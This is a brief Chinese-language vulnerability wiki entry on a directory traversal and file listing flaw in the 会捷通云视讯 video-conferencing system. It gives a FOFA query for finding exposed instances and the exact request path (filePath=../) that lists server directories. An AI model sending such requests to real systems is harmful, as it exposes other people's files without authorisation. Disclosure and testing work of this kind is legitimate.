会捷通云视讯 list 目录文件泄露漏洞

漏洞描述

会捷通云视讯某个文件 list参数 存在目录文件泄露漏洞,攻击者通过漏洞可以获取一些敏感信息

漏洞影响

[!NOTE]

会捷通云视讯

FOFA

[!NOTE]

body="/him/api/rest/v1.0/node/role"

漏洞复现

登陆页面如下

访问Url

/him/api/rest/V1.0/system/log/list?filePath=../

Goby & POC

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-05-20 23:44:42

results matching ""

    No results matching ""